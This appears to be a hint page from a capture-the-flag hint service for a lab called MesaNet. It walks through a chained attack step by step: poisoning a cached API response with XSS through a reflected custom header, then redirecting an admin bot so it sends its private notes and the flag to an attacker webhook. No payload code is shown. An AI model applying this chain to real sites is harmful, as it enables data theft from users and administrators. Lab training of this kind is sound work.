MesaNet is a Black Mesa Transit rail broadcast panel running on Bugforge's lab infrastructure. The application caches API responses and reflects a custom header value directly into HTML, creating a chained attack path: poison the cache with a script injected via a custom header, then trick a bot into viewing the poisoned page — causing it to exfiltrate its private notes (and the flag) to an attacker-controlled webhook.
Objective: Within the 60-second cache window, redirect the bot to the poisoned /api/rail/display page so it executes your XSS payload, fetches its own notes from /api/notes/lists via /gateway, and exfiltrates the content — including the flag — to your webhook.
Context: You have: (1) a poisoned cache entry at /api/rail/display that will serve your XSS for up to 60 seconds, (2) a webhook URL ready to receive exfiltrated data, and (3) knowledge that changing 'view':'current' to 'view':'display' in the submission request directs the bot to that page. The attack must be executed within the cache TTL window. Set up your webhook listener BEFORE sending the submission.
Only reveal the ones you need. Claude tracks how many you used to calibrate the feedback.
Timing matters — you need to poison the cache first, then immediately redirect the bot to the poisoned page before the 60-second cache expires.
Modify the 'Submit for Oversight Review' POST body to change the 'view' value so the bot loads the /api/rail/display endpoint. The bot will execute the cached XSS, which will fetch /api/notes/lists on the bot's behalf and send the result to your webhook.
Step 1: Send the poisoned GET /api/rail/display with your X-Rail-Skin payload and confirm X-Cache: HIT. Step 2: Immediately send the modified POST to /gateway with 'view':'display'. Step 3: Watch your webhook for an incoming request containing the base64-encoded notes. Decode the base64 to reveal the flag.
Enjoying Hintru? Buy me a coffee ☕ ☕